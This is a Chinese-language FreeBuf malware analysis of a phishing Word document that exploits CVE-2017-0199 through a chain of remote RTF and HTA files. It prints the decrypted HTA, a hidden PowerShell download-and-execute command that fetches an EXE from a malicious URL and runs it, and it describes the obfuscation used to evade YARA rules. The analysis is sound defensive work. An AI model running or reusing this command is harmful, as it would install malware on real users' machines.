专栏首页FreeBufCVE 2017-0199漏洞利用的新姿势

CVE 2017-0199漏洞利用的新姿势

近日从客户处捕获一枚邮件附件中的可疑word样本,以下是扫描结果,检测率貌似不高。

手动分析吧。

文件md5:0b16b255918264667a9f03e0b9f45167

1.攻击流程的第一步

打开该word样本没有给任何提示该就直接联网获取文件:

windbg挂着找了半天,一直没发现这个链接动作是怎么触发的。后来在发现 document.xml.rels里面找到一个链接到外部的oleobject对象,指向地址https://klotshop.tech/images/maps/tisty.doc。

在document.xml里找到该oleobject的属性。

            ![CVE 2017-0199漏洞利用的新姿势](http://image.3001.net/images/20171225/15141736033162.png!small) 

通过这个oleobject ,office可以链接外部的office文档,当然这个oleobject属性也可以添加script monker ,soap monker标签来触发0199和8579等office漏洞, 目前也发现了用使用这样的方法来攻击的样本一批样本。

2.攻击流程的第二步

Tisty.doc下载下来后发现是个rtf格式的文档,Vt上一看,只有几个厂商对这个文件检测,也就是说如果用这个文件来做攻击的话国内的杀软都会漏过去?

文件头如下:

Objaulink objupdate,标准的0199的线索,继续往下找,:

Urlmonker 的标识符E0C9EA79F9BACE118C8200AA004BA90B,病毒作者加入了各种符号混淆,目的就是绕过网上公开的那些yara规则,继续往下:

url的地址,为了绕过yara检测,也是加入了各种符号隔开有意义的字符段,不过看起来效果很好,vt上对这个文档的检测确实很少。

url解出来后是https://klotshop.tech/images/maps/nin.hta,一个hta文件,由于0199漏洞的存在,该hta文件会被直接执行。

3.恶意攻击流程的第三步:

nin.hta文件内容如下:

解密后如下:

Dim  adIM  bSET   a       =       CreateObject("WScript.Shell")      b       =       " pOWershELl.ExE -EX bYpASs -Nop -whIDDEn iNvOKE-WEbrEQuESt -uri 'https://longstop.club/Smileys/kina/dlnd.php'-OUtfilE    '%APPdATa%\kalat.exe' ; InvOKe-iTem '%appdATa%\kalat.exe'"        a.rUN       "\"C:\\Windows\\system32\\cmd.exe\"\"/c\"",   0       SET   a       =       nOtHINgself.CloSE

4.攻击流程的第四步:

第三步中的hta文件主要功能就是用powershell去访问https://longstop.club/Smileys/kina/dlnd.php并将返回的内容保存为%APPdATa%\kalat.exe并执行。

该链接会302到另外一个地址。

https://fex.net/get/177440922804/108291971

然后又会继续302到https://fs5.fex.net/get/177440922804/108291971/a4f874ea/fate.exe

https://fex.net/是一个类似网上云盘的网站,可以让用户随意上传文件。

最后会下载到这个exe

5.攻击流程的第五步:

fate.exe,会释放一个autoit脚本加载器和一个加密的autoit脚本,以及一些其他的文件,并调用加载器加载该autoit脚本。

Autoit脚本加载器是干净的官方版本,不会被杀,而加密的脚本本身不是可执行格式,因此也不会被杀,也就是这个文件释放出来的所有文件都不会被查杀,作者也是试图通过这种手段来免杀,不过效果看起来不太好,vt信息显示这个文件本身被大多数厂商检测。

综合上面的分析,第二步中的恶意文档被查杀的概率很低,第一步中的文档次之,而最后一步中的恶意软件检出率非常高,可以看到钓鱼攻击中使用各种带变形后的nday的文档而非exe来绕过杀软的静态检测还是很奏效,当然最后这个真正实施恶意行为的pe免杀实在做的很差。

本文分享自微信公众号 - FreeBuf(freebuf),作者:kczwa1

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-12-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 浅谈非PE的攻击技巧

    背景 近日,金山毒霸安全中心捕获到一例利用邮件传播的非PE样本,类型为lnk快捷方式文件,执行后会下载勒索病毒,最终会加密用户机器上的文档、图片、视频等重要文件...

    FB客服
  • 间谍软件Agent Tesla变种再现:通过特制Word文档诱导安装

    近期 Fortinet 研究专家发现臭名昭著的间谍软件 Agent Tesla 出现了全新的变种,而变种传播是通过特制的 Microsoft Word文件进行的...

    FB客服
  • 一个Hancitor恶意邮件活动Word文档样本的分析

    最近,基于word文档的电子邮件攻击愈发猛烈。邮箱收到一封电子邮件,包含如下的WORD附件。文档打开后,显示如下图。内容就是一幅图片,提示要查看具体的传真内容要...

    FB客服
  • 基于selenium爬取拉勾网职位信息

      Selenium 本是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中,就像真正的用户在操作一样。而这一特性为爬虫开发提供了一个选择...

    py3study
  • Elasticsearch学习-嵌套文档

    最近一段时间都在搞Elasticsearch搜索相关的工作,总结一下搜索知识点供大家参考。

    dalaoyang
  • 增强CNN学习能力的Backbone:CSPNet

    Cross Stage Partial Network(CSPNet)就是从网络结构设计的角度来解决以往工作在推理过程中需要很大计算量的问题。

    BBuf
  • 一万副扑克分牌问题

    问题描述:给你一万副扑克(一共540000张乱序)和一万个人,请设计一种算法,能够有效的将一万副扑克都分出来,并且每一副牌都是按数字和花色排好序的。 总任务:将...

    张俊怡
  • Arctan的快速近似算法

    \(arctan\)的近似计算本质上是在所需精度范围内对\(arctan\)曲线进行拟合,比较直接的想法是泰勒展开,

    李拜六不开鑫
  • 2018-11-28 Asciidoc 比Markdown更简洁强大的文档工具

    使用Asciidoc代替Markdown和Word撰写开发文档 https://my.oschina.net/gudaoxuri/blog/524132

    Albert陈凯
  • 未来最有可能被投资商关注的企业级产品推荐:企业社交软件iWorker

    不知道从什么时候起,我的公众微信里聚集了一堆搞企业级产品的投资客,经过几次的交流,很多的投资商都问了我同一个问题,你认为哪些公司适合投资,能否帮忙推荐一些比较好...

    人称T客

扫码关注云+社区

领取腾讯云代金券